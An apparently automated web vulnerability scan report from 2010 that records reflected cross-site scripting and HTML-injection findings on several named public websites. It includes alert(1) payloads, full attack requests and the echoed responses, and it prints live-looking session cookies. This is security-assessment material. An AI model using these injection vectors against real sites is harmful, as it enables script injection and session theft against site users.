HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Date: Sun, 21 Nov 2010 17:15:19 GMT Connection: keep-alive Set-Cookie: Commerce2002_TestSessionCookie=TestCookie; path=/ Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 17:15:19 GMT; path=/ Cache-Control: no-cache Expires: -1 Pragma: no-cache Pragma: no-cache Content-Length: 8297
<title>Submit6a17b</title><x style=x:expression(alert(1))>1898685ddda931a7<x style=x:expression(alert(1))>96a5af8d84d44cce5</title> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HT ...[SNIP]...
The value of the windowTitle request parameter is copied into the HTML document as text between TITLE tags. The payload 6a17b</title><x%20style%3dx%3aexpression(alert(1))>1898685ddda was submitted in the windowTitle parameter. This input was echoed as 6a17b</title><x style=x:expression(alert(1))>1898685ddda in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /accenture/registration/PrintThis.aspx?GUID={13DF5E01-389F-4013-BC36-296A775C1FE5}&footerGuid=9E541954-D5F8-4EC6-AF22-9FF473A55D70&authorContext=PresentationPublished&channelguid={4FDF0FFF-C188-490F-AEA1-A93A6B40D85B}&windowTitle=Submit6a17b</title><x%20style%3dx%3aexpression(alert(1))>1898685ddda HTTP/1.1 Host: www.accenture.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition Content-Type: text/html; charset=utf-8 Date: Sun, 21 Nov 2010 16:47:05 GMT Content-Length: 8127 Connection: close Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:47:05 GMT; path=/ Cache-Control: no-cache Expires: -1 Pragma: no-cache Pragma: no-cache
<title>Submit6a17b</title><x style=x:expression(alert(1))>1898685ddda</title> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <title>PrintThis</title>
The value of the windowTitle request parameter is copied into the HTML document as text between TITLE tags. The payload 71140</title><x%20style%3dx%3aexpression(alert(1))>22cfa4275fecd007f was submitted in the windowTitle parameter. This input was echoed as 71140</title><x style=x:expression(alert(1))>22cfa4275fecd007f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Date: Sun, 21 Nov 2010 17:15:36 GMT Connection: keep-alive Set-Cookie: Commerce2002_TestSessionCookie=TestCookie; path=/ Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 17:15:36 GMT; path=/ Cache-Control: no-cache Expires: -1 Pragma: no-cache Pragma: no-cache Content-Length: 8183
<title>71140</title><x style=x:expression(alert(1))>22cfa4275fecd007f</title> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <title>PrintThis</title>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51be1"-alert(1)-"86235a760be was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmark.php51be1"-alert(1)-"86235a760be HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 21 Nov 2010 17:13:55 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=5jcqmj343pegjkpgcn6sniqk25; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1447 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/bookmark.php51be1"-alert(1)-"86235a760be"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 32c01<script>alert(1)</script>1eff1198961 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bookmark.php32c01<script>alert(1)</script>1eff1198961 HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 21 Nov 2010 17:13:56 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=4l75jifc1vmjsl9ceq8smd6no3; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1473 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <strong>bookmark.php32c01<script>alert(1)</script>1eff1198961</strong> ...[SNIP]...
1.142. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.addthis.com
Path:
/bookmark.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ba68"-alert(1)-"56e962f9ff9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmark.php/5ba68"-alert(1)-"56e962f9ff9 HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 17:13:52 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/ Content-Length: 88293
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <script type="text/javascript"> var u = "/bookmark.php/5ba68"-alert(1)-"56e962f9ff9"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
1.143. http://www.dailyrotation.com/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.dailyrotation.com
Path:
/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a7d53'><script>alert(1)</script>ea2cc056bdc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.php/a7d53'><script>alert(1)</script>ea2cc056bdc HTTP/1.1 Host: www.dailyrotation.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 18:11:57 GMT Server: Apache/2.0.51 (Fedora) X-Powered-By: PHP/4.3.10 Set-Cookie: PHPSESSID=8fe5413863d004cd4dffc69e9523aac6; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: private Pragma: no-cache Connection: close Content-Type: text/html Content-Length: 208601
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <HTML> <HEAD>
1.144. http://www.dailyrotation.com/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.dailyrotation.com
Path:
/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5acc8"><script>alert(1)</script>328385cd11c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.php/5acc8"><script>alert(1)</script>328385cd11c HTTP/1.1 Host: www.dailyrotation.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 18:11:53 GMT Server: Apache/2.0.51 (Fedora) X-Powered-By: PHP/4.3.10 Set-Cookie: PHPSESSID=c8c0a760cd8f98cd3b42b976fc403223; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: private Pragma: no-cache Connection: close Content-Type: text/html Content-Length: 212394
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <HTML> <HEAD>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3e8b"><script>alert(1)</script>3501892d15d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /poste3e8b"><script>alert(1)</script>3501892d15d HTTP/1.1 Host: www.delicious.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 17:57:35 GMT Set-Cookie: BX=bk4eee96eincf&b=3&s=p9; expires=Tue, 21-Nov-2012 20:00:00 GMT; path=/; domain=.delicious.com P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Set-Cookie: searchTray=deleted; expires=Sat, 21-Nov-2009 17:57:34 GMT; path=/; domain=.delicious.com Pragma: no-cache Cache-Control: no-store, must-revalidate, no-cache, private, max-age=0, post-check=0, pre-check=0 X-Xss-Protection: 0 Expires: Sun, 1 Jan 2006 01:00:00 GMT X-Ua-Compatible: IE=7 Set-Cookie: delicious_us_production=aOBwa0.OcQ6pvK8qi9rZPTho35F3kIgcrHKdNprAMBBeH0VAWeQUPcYK5diyA_KPmnbHcmDB7qOeHc.Y1SF_.JjJp3zW5idQnvtldXV5sLdQCx8VnSgf1vH12i8Il3UjL17Mnbx3uUKpBlJQUkWXoS.sPQWto5Rkd61EA50IQniwMKL7iRakgzOAS8TpWfy2QEjhf3gNQq0Y199oHJMHFSnHGHDGYsZupZ.D.tshfMRVzxsd.xDL_9RxZp.CbZ_jt9LHs0Z8bFlSqjXnVzKnTH1uGBgBRw1O6Fdti2MQqAsVOLsF0h_kxrpSOG_AaqnSSjAPe38pjVo-; expires=Mon, 21-Nov-2011 17:57:35 GMT; path=/; domain=.delicious.com Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Age: 0 Connection: close Server: YTS/1.17.21
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta h ...[SNIP]... <a href="/poste3e8b"><script>alert(1)</script>3501892d15d?settagview=cloud"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe581"><script>alert(1)</script>c005148dcf7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /robots.txtfe581"><script>alert(1)</script>c005148dcf7 HTTP/1.1 Host: www.delicious.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 17:57:32 GMT Set-Cookie: BX=e7fd4k16eincc&b=3&s=o5; expires=Tue, 21-Nov-2012 20:00:00 GMT; path=/; domain=.delicious.com P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Set-Cookie: searchTray=deleted; expires=Sat, 21-Nov-2009 17:57:31 GMT; path=/; domain=.delicious.com Pragma: no-cache Cache-Control: no-store, must-revalidate, no-cache, private, max-age=0, post-check=0, pre-check=0 X-Xss-Protection: 0 Expires: Sun, 1 Jan 2006 01:00:00 GMT X-Ua-Compatible: IE=7 Set-Cookie: delicious_us_production=ckLtZtuNcQ42hIKZOkVaFKp1JLyzleBmiYSELxBCLupLYTAmo._oO8G9g2QNgTa7Nq8.YwWIKx9zQzypWUrdoMHsBt0YAkTsLhd67VFA93GJkBxj1Jtyb0iZSqWUABH1gRu6FXSTdIcBRVWJPj.E8WbkZPnKl0_S3.1lg1VxI9xpje0Gm4ce912BwZmgo3zQmkCG.SaOQv5_A3xNAWK42K38CN_5CfI0FhWlI2bp1wN.mO8DjVwhqQf90d_CHS5Yvfol9oB_f6ZEYCdxrjdbFil1Gz5E3mZn7LmhiRoL43vjABOUMY0Rc3ZNvdGrErptGcanCtfjnuM-; expires=Mon, 21-Nov-2011 17:57:32 GMT; path=/; domain=.delicious.com Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Age: 0 Connection: close Server: YTS/1.17.21
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta h ...[SNIP]... <a href="/robots.txtfe581"><script>alert(1)</script>c005148dcf7?settagview=cloud"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7cef6"><a>d1a9d545bb1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /beer_finder7cef6"><a>d1a9d545bb1/ HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.ninkasibrewing.com/ Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:44:34 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13222
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19329"><a>8b6dab35f14 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /beer_finder19329"><a>8b6dab35f14/content/css/basic.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:48:43 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13222
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b114"><a>2a2a038a928 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /beer_finder6b114"><a>2a2a038a928/content/css/ninkasi.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:48:43 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13222
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 536f7"><a>2e8ea686748 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /beer_finder536f7"><a>2e8ea686748/content/css/print.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:48:45 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13222
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4b6f"><a>5c83f0838cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /beer_finderf4b6f"><a>5c83f0838cb/content/js/basic.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:48:47 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13222
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85e44"><a>7d1f97cbdd2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /beer_finder85e44"><a>7d1f97cbdd2/content/js/combined.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:48:50 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13222
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 392d4"><a>7acca5121c2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /beer_finder392d4"><a>7acca5121c2/content/js/combined.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:48:51 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13222
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e8d2"><a>16a8c03f2fd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /beers4e8d2"><a>16a8c03f2fd/ HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.wired.com/playbook/?intcid=gnav
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:44:34 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=rl6vcsjo3iil8biltj6mc4n0r2; path=/ Vary: Accept-Encoding Content-Type: text/html Content-Length: 13210
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41638"><a>88fb649091c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /beers41638"><a>88fb649091c/content/css/basic.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:48:52 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13210
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 132d9"><a>11e6d305782 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /beers132d9"><a>11e6d305782/content/css/ninkasi.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 500 Internal Server Error Date: Sun, 21 Nov 2010 21:48:54 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html
